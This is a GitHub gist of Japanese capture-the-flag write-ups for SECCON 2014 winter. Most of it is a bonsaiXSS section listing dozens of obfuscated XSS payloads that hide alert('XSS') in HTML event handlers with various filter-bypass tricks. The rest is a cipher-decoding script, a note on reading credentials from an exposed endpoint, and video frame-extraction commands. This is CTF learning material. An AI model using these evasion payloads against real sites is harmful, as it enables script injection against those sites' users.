3846masa/!_SECCON_2014_winter.md

## !_SECCON_2014_winter.md

      
    Raw
  

              !_SECCON_2014_winter.md
            
          
    .

  
## bonsaiXSS.md

      
    Raw
  

              bonsaiXSS.md
            
          
    // 結局最後まで行けなかった
// 0x254534254241253843254535254241254136254533253831254138254533253832253834254533253832253842254533253831253842

// alert('XSS')を出す魔法のスクリプト
// 引用：http://blog.atgw.jp/archives/2865
$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['constructor']['constructor']('($.___)[\'constructor\'][\'constructor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()
作ったコード群
";$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)["constructor"]["constructor"]("($.___)[\"constructor\"][\"constructor\"](\""+"\\"+$.__$+$.$__+$.__$+"\\"+$.__$+$.$_$+$.$__+"\\"+$.__$+$.$__+$.$_$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$.$__+"\\"+$.$_$+$.___+"\\"+$.$__+$._$_+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$._$$+"\\"+$.$__+$._$_+"\\"+$.$_$+$.__$+"\")()")()//

\";$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\x63onstructor']['\x63onstructor']('($.___)[\'\\x63onstructor\'][\'\\x63onstructor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()//

');$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\u0063onstructor']['\u0063onstructor']('($.___)[\'\\u0063onstructor\'][\'\\u0063onstructor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()//

");}$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\x63onstruc\x74or']['\x63onstruc\x74or']('($.___)[\'\\x63onstruc\\x74or\'][\'\\x63onstruc\\x74or\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()//

\x3Cimg//onmouseenter=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\\u0063onstruc\\u0074or']['\\u0063onstruc\\u0074or']('($.___)[\\'\\\\u0063onstruc\\\\u0074or\\'][\\'\\\\u0063onstruc\\\\u0074or\\'](\\''+'\\\\'+$.__$+$.$__+$.__$+'\\\\'+$.__$+$.$_$+$.$__+'\\\\'+$.__$+$.$__+$.$_$+'\\\\'+$.__$+$.$$_+$._$_+'\\\\'+$.__$+$.$$_+$.$__+'\\\\'+$.$_$+$.___+'\\\\'+$.$__+$._$_+'\\\\'+$.__$+$._$$+$.___+'\\\\'+$.__$+$._$_+$._$$+'\\\\'+$.__$+$._$_+$._$$+'\\\\'+$.$__+$._$_+'\\\\'+$.$_$+$.__$+'\\')()')()\x3E111111111

\u003Ciframe//onmouseout=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\\x63onstru\\x63tor']['\\x63onstru\\x63tor']('($.___)[\\'\\\\x63onstru\\\\x63tor\\'][\\'\\\\x63onstru\\\\x63tor\\'](\\''+'\\\\'+$.__$+$.$__+$.__$+'\\\\'+$.__$+$.$_$+$.$__+'\\\\'+$.__$+$.$__+$.$_$+'\\\\'+$.__$+$.$$_+$._$_+'\\\\'+$.__$+$.$$_+$.$__+'\\\\'+$.$_$+$.___+'\\\\'+$.$__+$._$_+'\\\\'+$.__$+$._$$+$.___+'\\\\'+$.__$+$._$_+$._$$+'\\\\'+$.__$+$._$_+$._$$+'\\\\'+$.$__+$._$_+'\\\\'+$.$_$+$.__$+'\\')()')()\u003E1111111

<img//src="#"//onerror=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\u0063onstru\u0063tor']['\u0063onstru\u0063tor']('($.___)[\'\\u0063onstru\\u0063tor\'][\'\\u0063onstru\\u0063tor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<iframe//onmousewheel=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\x63onstr\x75ctor']['\x63onstr\x75ctor']('($.___)[\'\\x63onstr\\x75ctor\'][\'\\x63onstr\\x75ctor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<applet//onmouseleave=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\u0063onstr\u0075ctor']['\u0063onstr\u0075ctor']('($.___)[\'\\u0063onstr\\u0075ctor\'][\'\\u0063onstr\\u0075ctor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<object//onmouseover=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\x63onst\x72uctor']['\x63onst\x72uctor']('($.___)[\'\\x63onst\\x72uctor\'][\'\\x63onst\\x72uctor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<embed//onmousemove=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\u0063onst\u0072uctor']['\u0063onst\u0072uctor']('($.___)[\'\\u0063onst\\u0072uctor\'][\'\\u0063onst\\u0072uctor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<input//onkeydown=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\x63ons\x74ructor']['\x63ons\x74ructor']('($.___)[\'\\x63ons\\x74ructor\'][\'\\x63ons\\x74ructor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<textarea//onchange=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\u0063ons\u0074ructor']['\u0063ons\u0074ructor']('($.___)[\'\\u0063ons\\u0074ructor\'][\'\\u0063ons\\u0074ructor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<isindex//onfocusin=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\x63on\x73tructor']['\x63on\x73tructor']('($.___)[\'\\x63on\\x73tructor\'][\'\\x63on\\x73tructor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<MARQUEE//behavior="alternate"//onbounce=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\u0063on\u0073tructor']['\u0063on\u0073tructor']('($.___)[\'\\u0063on\\u0073tructor\'][\'\\u0063on\\u0073tructor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>qwertyuiopqwertyuiopqwertyuiopqwertyuiop</marquee>

<div//onbeforecopy=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\x63o\x6estructor']['\x63o\x6estructor']('($.___)[\'\\x63o\\x6estructor\'][\'\\x63o\\x6estructor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>eoieojgiwjgiaiogjaiiegihergihroirfoiaooajoirjiojioejigjroijfioarfjaigrjargioa</div>

<span//oncopy=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['\u0063o\u006estructor']['\u0063o\u006estructor']('($.___)[\'\\u0063o\\u006estructor\'][\'\\u0063o\\u006estructor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>rqfwyiweooerowpererjrejgfjfjdosfifjofjgirgoieruoawjgorjirooafojog</span>

<plaintext//onmouseup=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['conKSTstructor'.replace(/KST/,'')]['conKSTstructor'.replace(/KST/,'')]('($.___)[\'conKSTstructor\'.replace(/KST/,\'\')][\'conKSTstructor\'.replace(/KST/,\'\')](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<center//onmousedown=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['rconstructo'.substring(00000001,2000000)+'rconstructo'.substring(-2000000,00000001)]['rconstructo'.substring(00000001,2000000)+'rconstructo'.substring(-2000000,00000001)]('($.___)[\'rconstructo\'.substring(00000001,2000000)+\'rconstructo\'.substring(-2000000,00000001)][\'rconstructo\'.substring(00000001,2000000)+\'rconstructo\'.substring(-2000000,00000001)](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>iieuorowtqogjoirjrgojafoijraoigiaogrirhiogrioj</center>

<BLOCKQUOTE//onselectstart=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['nstructorco'.substr(00000009,200000)+'nstructorco'.substr(-200000,00000009)]['nstructorco'.substr(00000009,200000)+'nstructorco'.substr(-200000,00000009)]('($.___)[\'nstructorco\'.substr(00000009,200000)+\'nstructorco\'.substr(-200000,00000009)][\'nstructorco\'.substr(00000009,200000)+\'nstructorco\'.substr(-200000,00000009)](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>ijrgjrgjooijogrjoropgjrpag</BLOCKQUOTE>

<h2//ondblclick=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['structorcon'.slice(00000008,2000)+'structorcon'.slice(-2000,00000008)]['structorcon'.slice(00000008,2000)+'structorcon'.slice(-2000,00000008)]('($.___)[\'structorcon\'.slice(00000008,2000)+\'structorcon\'.slice(-2000,00000008)][\'structorcon\'.slice(00000008,2000)+\'structorcon\'.slice(-2000,00000008)](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>hfheogwiaioawugogrjioragoiugoa</h2>

<pre//oncontextmenu=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['construct\x6fr']['construct\x6fr']('($.___)[\'construct\\x6fr\'][\'construct\\x6fr\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>heiojigueoigajgoiauofnasagagr</pre>

<form//onsubmit=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)[String.fromCharCode(0x00000063,0x0000006f,0x0000006e,0x00000073,0x00000074,0x00000072,0x00000075,0x00000063,0x00000074,0x0000006f,0x00000072)][String.fromCharCode(0x00000063,0x0000006f,0x0000006e,0x00000073,0x00000074,0x00000072,0x00000075,0x00000063,0x00000074,0x0000006f,0x00000072)]('($.___)[String.fromCharCode(0x00000063,0x0000006f,0x0000006e,0x00000073,0x00000074,0x00000072,0x00000075,0x00000063,0x00000074,0x0000006f,0x00000072)][String.fromCharCode(0x00000063,0x0000006f,0x0000006e,0x00000073,0x00000074,0x00000072,0x00000075,0x00000063,0x00000074,0x0000006f,0x00000072)](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()><button//type="submit"></form>

<select//onfocusout=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['constr'+'uctor']['constr'+'uctor']('($.___)[\'constr\'+\'uctor\'][\'constr\'+\'uctor\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>

<h3//onbeforeupdate=$=+[];$={___:$++,__$:$++,_$_:$++,_$$:$++,$__:$++,$_$:$++,$$_:$++,$$$:$++};($.___)['con'+'str'+'uct'+'or']['con'+'str'+'uct'+'or']('($.___)[\'con\'+\'str\'+\'uct\'+\'or\'][\'con\'+\'str\'+\'uct\'+\'or\'](\''+'\\'+$.__$+$.$__+$.__$+'\\'+$.__$+$.$_$+$.$__+'\\'+$.__$+$.$__+$.$_$+'\\'+$.__$+$.$$_+$._$_+'\\'+$.__$+$.$$_+$.$__+'\\'+$.$_$+$.___+'\\'+$.$__+$._$_+'\\'+$.__$+$._$$+$.___+'\\'+$.__$+$._$_+$._$$+'\\'+$.__$+$._$_+$._$$+'\\'+$.$__+$._$_+'\\'+$.$_$+$.__$+'\')()')()>kjoeragrpegieagieguagaf</h3>


## Easy_Cipher.js
var str = "87 101 108 1100011 0157 6d 0145 040 116 0157 100000 0164 104 1100101 32 0123 69 67 0103 1001111 1001110 040 062 060 49 064 100000 0157 110 6c 0151 1101110 101 040 0103 1010100 70 101110 0124 1101000 101 100000 1010011 1000101 67 0103 4f 4e 100000 105 1110011 040 116 1101000 0145 040 1100010 0151 103 103 0145 1110011 0164 100000 1101000 0141 99 6b 1100101 0162 32 0143 111 1101110 1110100 101 0163 0164 040 0151 0156 040 74 0141 1110000 1100001 0156 056 4f 0157 0160 115 44 040 0171 1101111 117 100000 1110111 0141 0156 1110100 32 0164 6f 32 6b 1101110 1101111 1110111 100000 0164 1101000 0145 040 0146 6c 97 1100111 2c 100000 0144 111 110 100111 116 100000 1111001 6f 117 63 0110 1100101 0162 0145 100000 1111001 111 117 100000 97 114 0145 46 1010011 0105 0103 67 79 1001110 123 87 110011 110001 67 110000 1001101 32 55 060 100000 110111 0110 110011 32 53 51 0103 0103 060 0116 040 5a 0117 73 0101 7d 1001000 0141 1110110 1100101 100000 102 0165 0156 33";
var arr = str.split(' ');
var txt = "";
arr.forEach(function(i) {
    if (i.length > 3 && i.match(/^1[01]+$/)) num = parseInt(i, 2);
    else if (i.match(/[a-fA-F]/)) num = parseInt(i, 16);
    else if (i.match(/^0/)) num = parseInt(i, 8);
    else num = parseInt(i, 10);
    console.log(i);
    console.log(num);
    txt += String.fromCharCode(num);
});
console.log(txt);

## REA-JUU WATCH.md

      
    Raw
  

              REA-JUU WATCH.md
            
          
    アクセスログ見ると
http://reajuu.pwn.seccon.jp/users/chk/{number}

ってなってるんで
http://reajuu.pwn.seccon.jp/users/chk/1

にアクセスすると
{"username":"rea-juu","password":"way_t0_f1ag","point":99999}

ってなるから，これでログインして最後まで適当に行くとフラグがある
おしまい

  
## SECCON Wars: The Flag Awaken.md

      
    Raw
  

              SECCON Wars: The Flag Awaken.md
            
          
    動画をDLする
Youtubeの動画をhogehogeするscript - 3846masa Blog
そんで，ffmpegでフレームごとに画像化
ffmpeg -i download.webm -f image2 out_%3d.jpg

関係ないフレームを取り除いた後に
imagemagickで画面下1pxを切り出し，連結
convert *.jpg -crop '320x1+0+239' _crop_%03d.png
for file in ./_crop_*.png; do convert -append ./__export.png "${file}" ./__export.png; done

そうすると，こんな画像が出る

あとは画像編集ソフトで引き伸ばして取ればいい
おしまい
	var str = "87 101 108 1100011 0157 6d 0145 040 116 0157 100000 0164 104 1100101 32 0123 69 67 0103 1001111 1001110 040 062 060 49 064 100000 0157 110 6c 0151 1101110 101 040 0103 1010100 70 101110 0124 1101000 101 100000 1010011 1000101 67 0103 4f 4e 100000 105 1110011 040 116 1101000 0145 040 1100010 0151 103 103 0145 1110011 0164 100000 1101000 0141 99 6b 1100101 0162 32 0143 111 1101110 1110100 101 0163 0164 040 0151 0156 040 74 0141 1110000 1100001 0156 056 4f 0157 0160 115 44 040 0171 1101111 117 100000 1110111 0141 0156 1110100 32 0164 6f 32 6b 1101110 1101111 1110111 100000 0164 1101000 0145 040 0146 6c 97 1100111 2c 100000 0144 111 110 100111 116 100000 1111001 6f 117 63 0110 1100101 0162 0145 100000 1111001 111 117 100000 97 114 0145 46 1010011 0105 0103 67 79 1001110 123 87 110011 110001 67 110000 1001101 32 55 060 100000 110111 0110 110011 32 53 51 0103 0103 060 0116 040 5a 0117 73 0101 7d 1001000 0141 1110110 1100101 100000 102 0165 0156 33";
	var arr = str.split(' ');
	var txt = "";
	arr.forEach(function(i) {
	if (i.length > 3 && i.match(/^1[01]+$/)) num = parseInt(i, 2);
	else if (i.match(/[a-fA-F]/)) num = parseInt(i, 16);
	else if (i.match(/^0/)) num = parseInt(i, 8);
	else num = parseInt(i, 10);
	console.log(i);
	console.log(num);
	txt += String.fromCharCode(num);
	});
	console.log(txt);